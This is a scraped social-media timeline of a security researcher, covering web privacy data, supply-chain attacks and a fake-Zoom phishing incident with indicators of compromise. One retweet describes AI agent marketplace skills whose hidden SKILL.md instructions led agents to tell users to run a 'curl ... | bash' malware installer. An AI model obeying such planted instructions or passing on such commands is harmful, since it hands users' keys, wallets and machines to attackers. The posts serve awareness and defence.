Vinod Tiwari
@securient

5.9K posts

Web3 Security, solutions architect, bug hunter, DevSecOps.

California · Joined March 2010
950 Following · 570 Followers

Pinned Tweet
Vinod Tiwari@securient·
🚀 The Web Almanac 2025 is live! Proud to have authored the Privacy chapter and reviewed the Security chapter for this year's edition. The Web Almanac is HTTP Archive's annual deep-dive into how the web is actually built, analyzing millions of sites with real data, peer review, and 90+ contributors. Key finding: 75% of sites have at least one tracker 👀
📖 Privacy: almanac.httparchive.org/en/2025/privacy
🛡️ Security: almanac.httparchive.org/en/2025/securi…
#WebAlmanac #Privacy #Security #InfoSec
Vinod Tiwari retweeted
Nicolas Krassas@Dinosn·
I built an open-source library of 700+ cybersecurity skills for AI coding agents -- covers DFIR, threat hunting, cloud security, and more github.com/mukul975/Anthr…
Vinod Tiwari@securient·
A new and concerning npm supply chain attack, dubbed 'Sandworm Mode,' has emerged, actively compromising developer environments. This sophisticated worm isn't just infecting repos; it's designed to hijack your CI/CD workflows, steal critical CI secrets, and even target developer AI toolchains for deeper compromise. Source: socket.dev/blog/sandworm-…
Vinod Tiwari retweeted
chiefofautism@chiefofautism·
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attacker's server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE

OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins. you install a skill, your AI agent gets new powers, this sounds great

the problem? ClawHub let ANYONE publish with just a 1 week old github account

attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command

> to enable this feature please run: curl -sL malware_link | bash

that one command installed Atomic Stealer on macOS. it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files. on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine

Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1

this is npm supply chain attacks all over again except the package can THINK and has root access to your life
Vinod Tiwari@securient·
Just released API Doc Converter, a Burp Suite extension that generates OpenAPI specs from any web app's traffic. No API docs? No problem. Browse the app, export the spec.
- Auto-detects endpoints, auth, schemas, GraphQL
- Exports OpenAPI 3.0, Postman, GraphQL SDL
- cURL generation + sensitive data flagging
Open source: github.com/securient/Burp… @PortSwigger
Vinod Tiwari retweeted
Aditya Agarwal@adityaag·
It's a weird time. I am filled with wonder and also a profound sadness. I spent a lot of time over the weekend writing code with Claude. And it was very clear that we will never ever write code by hand again. It doesn't make any sense to do so. Something I was very good at is now free and abundant. I am happy...but disoriented. At the same time, something I spent my early career building (social networks) was being created by lobster-agents. It's all a bit silly...but if you zoom out, it's kind of indistinguishable from humans on the larger internet. So both the form and function of my early career are now produced by AI. I am happy but also sad and confused. If anything, this whole period is showing me what it is like to be human again.
Vinod Tiwari retweeted
Poseidon@psdnai·
Introducing the Poseidon Voice AI Dataset. 33K+ hours of rights-cleared audio across low-resource languages. In several languages, this exceeds years of public data collection. Below, a technical deep dive on the data ↓
Vinod Tiwari retweeted
Story@StoryProtocol·
Security at Story extends beyond code. It includes how governance decisions are reviewed, scheduled, and executed onchain, especially when the stakes are high. More details ↴
Vinod Tiwari@securient·
Yeah, that landing URL was also using the same TLD. It's just that they edited the link right away as soon as the engineer clicked on it. No history available now, because we wiped clean the affected machine. Crowdstrike kept blocking the connection and it quarantined the file that was downloaded from the /developer endpoint. MetaMask did alert about the phishing URL in my browser (while trying it in a sandbox), but I guess the engineer didn't have MetaMask on their browser when they opened the link.
bbsz@blackbigswan·
Could you check browser history for what the landing URL was (the one cloaked on Telegram, it's a hyperlink text, ctrl+k to make it)? Or was it uv02webzoom[.]us too? Did you retrieve the payload from /developer/sdk/fix/2/version/0wan5Nwf6 by any chance? If so, could you open a ticket with @_SEAL_Org? Did you have MetaMask installed on the machine that visited the phishing (fake Zoom) front end? It's DPRK btw. These campaigns are very popular and they use the same TTPs over and over again. Initial approach, malware and phishing landing are auto deployed.
Vinod Tiwari@securient·
🚨 One of our engineers almost got drained yesterday. A hacker used a compromised Telegram account of someone we'd met at a conference to send a fake Zoom link. Here's how the attack worked and how we responded 📷👇
Vinod Tiwari retweeted
HTTP Archive 💾@HTTPArchive·
The 2025 Web Almanac by HTTP Archive has been officially released! 🚀 We would like to thank all of our contributors from around the globe who made this extensive report possible! Check out the full report here: almanac.httparchive.org #thewebalmanac
Vinod Tiwari retweeted
Story Engineers@StoryEngs·
Story Mainnet Maintenance Started
Expected downtime is ~24 to 48 hours. During this period, all on-chain transactions are paused and explorers are view only. User funds remain safe and unaffected during the upgrade. We'll share progress updates here and on Discord, and confirm once the network is fully live.
Vinod Tiwari retweeted
Matt Stoller@matthewstoller·
"Google emailed my youngest child today to tell him he is almost 13 and eligible to remove parental controls... A trillion dollar corporation is directly contacting every child to tell them they are old enough to “graduate” from parental supervision." linkedin.com/posts/melissa-…
Vinod Tiwari@securient·
IOCs for security teams:
🌐 Domain: uv02webzoom.us
📁 File type: .scpt (macOS)
🔗 C2 path: /developer/sdk/fix/2/version/0wan5Nwf6
🕵️ User-agent: "audio"
📜 Decoy command: softwareupdate --evaluate-products
Block and hunt accordingly.
Vinod Tiwari@securient·
If this helped, RT the first tweet so others see it. Seen similar attacks? Drop them below 👇 IOCs in the next tweet for security teams.